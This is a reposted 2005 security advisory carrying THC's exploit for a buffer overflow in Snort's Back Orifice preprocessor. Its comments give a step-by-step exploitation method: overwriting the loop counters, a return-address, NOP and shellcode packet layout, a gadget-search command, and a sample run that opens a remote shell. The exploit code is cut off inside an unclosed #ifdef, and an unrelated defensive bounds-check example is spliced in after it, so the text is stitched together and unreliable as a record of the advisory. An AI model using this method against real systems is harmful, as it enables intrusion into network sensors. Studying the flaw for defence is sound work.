Thursday, October 27, 2005

[EXPL] Snort Back Orifice Preprocessor Buffer Overflow (Exploit)

The following security advisory was sent to the SecuriTeam mailing list and can be found on the SecuriTeam web site: http://www.securiteam.com

Snort Back Orifice Preprocessor Buffer Overflow (Exploit)
------------------------------------------------------------------------

SUMMARY

<http://www.snort.org/> Snort is a widely-deployed, open-source network
intrusion detection system (IDS). Snort preprocessors are modular plugins
that extend functionality by operating on packets before the detection
engine is run.

Presented here is an exploit for the Snort Back Orifice preprocessor
buffer overflow. Exploiting a vulnerable system could allow a remote
attacker to execute arbitrary code.

DETAILS

Vulnerable Systems:
* Snort versions 2.4.0 to 2.4.2
* Sourcefire Intrusion Sensors

Exploit:
/*
* THCsnortbo 0.3 - Snort BackOrifice PING exploit
* by rd@thc.org
* THC PUBLIC SOURCE MATERIALS
*
* Bug was found by Internet Security Systems
* http://xforce.iss.net/xforce/alerts/id/207
*
* v0.3 - removed/cleaned up info for public release
* v0.2 - details added, minor changes
* v0.1 - first release
*
* Greetz to all guests at THC's 10th
* Anniversary (TAX) :>
*
* $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
*
*/

/*
* DETAILS
*
* The bug is in spp_bo.c, BoGetDirection() function
* static int BoGetDirection(Packet *p, char *pkt_data) {
* u_int32_t len = 0;
* u_int32_t id = 0;
* u_int32_t l, i;
* char type;
* char buf1[1024];
*
* ...
* buf_ptr = buf1;
* ...
* while ( i < len ) {
* plaintext = (char) (*pkt_data ^ (BoRand()%256));
* *buf_ptr = plaintext;
* i++;
* pkt_data++;
* buf_ptr++;
*
* len is taken from the BO packet header, so it's a buffer
* overflow when len > buf1 size.
*
* The exchange of data between the BO client and server is
* done using encrypted UDP packets
*
* BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html)
*
*   Mnemonic   Size in bytes
*   MAGIC      8
*   LEN        4
*   ID         4
*   T          1
*   DATA       variable
*   CRC        1
*
* On x86, because of the stack layout, we end up overwriting
* the loop counters (i and len). To solve this problem, we
* can set back the appropriate values for i and len. We are
* also able to set a NULL byte to stop the loop.
*
* There is no chance for brute force: snort will die after the
* first bad try. On a Linux system with kernel 2.6 with VA
* randomization, it would be much harder to get a reliable exploit.
*
*
* In the case of a _non-optimized_ compiled snort binary, the stack
* would look like this:
*
* [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data]
*
* The exploit could be reliable in this case, by using a
* pop/ret return address. Let's send snort a UDP packet
* like the following:
*
* [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][ shellcode ]
* [ Encrypted                                            ][ Non Encrypted    ]
*
* When the overwriting loop stops, pkt_data will point to
* the memory after the return address (NOP part) in the raw packet
* data. So, using a return address that points to POP/RET
* instructions would be enough for a reliable exploit.
* (objdump -d binary|grep -B1 ret|grep -A1 pop to find one)
*
* This method will work well under linux kernel 2.6 with VA
* randomized also.
*
* In the case of an optimized binary, it would be harder since
* the counters i, len and the buffer pointers could possibly be
* register variables, and the register pointing to the buffer
* gets popped from the stack when the function returns. In this case,
* the return address should be hard-coded, but it would be
* unreliable (especially on Linux kernel 2.6 with the VA
* randomization patch).
*
* This exploit would generally work, provided that you know
* how to find and use the correct offsets and return address :>
*
*
* Example:
*
* $ ./THCsnortbo
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Usage: ./THCsnortbo host target
*
* Available Targets:
* 1 | manual testing gcc with -O0
* 2 | manual testing gcc with -O2
*
* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1
*
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>
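As an added defensive example (not from the advisory, THC or the Snort source), here is the bounds check that the BoGetDirection() loop quoted in DETAILS lacks: LEN is validated against both the destination buffer and the datagram length before any byte is copied. The magic string, the keystream standing in for BoRand(), the little-endian LEN, the PING type value and the packet-building helper are constructed assumptions for this demo, not Snort's or Back Orifice's real values.

```c
#include <stdint.h>
#include <string.h>
#define BO_MAGIC_LEN  8
#define BO_HEADER_LEN (BO_MAGIC_LEN + 4 + 4 + 1)  /* MAGIC, LEN, ID, T */
#define BO_CRC_LEN    1
#define BUF1_SIZE     1024                       /* buf1[] in BoGetDirection() */

/* Constructed stand-ins for the BO magic and for Snort's BoRand() % 256 stream. */
static const unsigned char bo_magic[BO_MAGIC_LEN] = "MAGIC_08";
static unsigned char bo_ks(size_t pos) { return (unsigned char)(0x5a + 7 * pos); }

/* Test-packet builder: MAGIC, LEN (little-endian, assumed), ID, T, DATA, CRC,
 * whole datagram XORed with the keystream. Returns bytes written, 0 if no room. */
size_t bo_build(unsigned char *pkt, size_t cap, uint32_t len_field,
                const unsigned char *data, size_t data_len) {
    size_t total = BO_HEADER_LEN + data_len + BO_CRC_LEN;
    if (total > cap) return 0;
    memcpy(pkt, bo_magic, BO_MAGIC_LEN);
    for (int b = 0; b < 4; b++) pkt[8 + b] = (unsigned char)(len_field >> (8 * b));
    memset(pkt + 12, 0, 4);                       /* ID */
    pkt[16] = 1;                                  /* T (constructed PING type) */
    memcpy(pkt + BO_HEADER_LEN, data, data_len);
    pkt[total - 1] = 0;                           /* CRC, not validated here */
    for (size_t i = 0; i < total; i++) pkt[i] ^= bo_ks(i);
    return total;
}

/* Hardened decode: decrypt only the fixed header, read LEN, and refuse before the
 * copy loop if LEN exceeds the output buffer or the bytes actually on the wire.
 * Returns the data byte count, or -1 when the datagram is rejected. */
int bo_decode_checked(const unsigned char *pkt, size_t pkt_len,
                      unsigned char *out, size_t out_cap) {
    unsigned char hdr[BO_HEADER_LEN];
    if (pkt_len < BO_HEADER_LEN + BO_CRC_LEN) return -1;
    for (size_t i = 0; i < BO_HEADER_LEN; i++) hdr[i] = pkt[i] ^ bo_ks(i);
    if (memcmp(hdr, bo_magic, BO_MAGIC_LEN) != 0) return -1;
    uint32_t len = hdr[8] | hdr[9] << 8 | hdr[10] << 16 | (uint32_t)hdr[11] << 24;
    /* The bound BoGetDirection() lacks: LEN vs buf1 size and vs wire length. */
    if (len > out_cap || len > pkt_len - BO_HEADER_LEN - BO_CRC_LEN) return -1;
    for (uint32_t i = 0; i < len; i++)
        out[i] = pkt[BO_HEADER_LEN + i] ^ bo_ks(BO_HEADER_LEN + i);
    return (int)len;
}

/* 5 real data bytes but an arbitrary LEN field, decoded into a buf1-sized buffer. */
int demo_case(uint32_t len_field) {
    unsigned char pkt[64], out[BUF1_SIZE];
    size_t n = bo_build(pkt, sizeof pkt, len_field, (const unsigned char *)"PING!", 5);
    return n ? bo_decode_checked(pkt, n, out, sizeof out) : -2;
}
```

demo_case(4000) returns -1 where the unchecked loop would have written 4000 bytes into the 1024-byte buf1; demo_case(40) is also rejected because LEN claims more data than the datagram carries.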
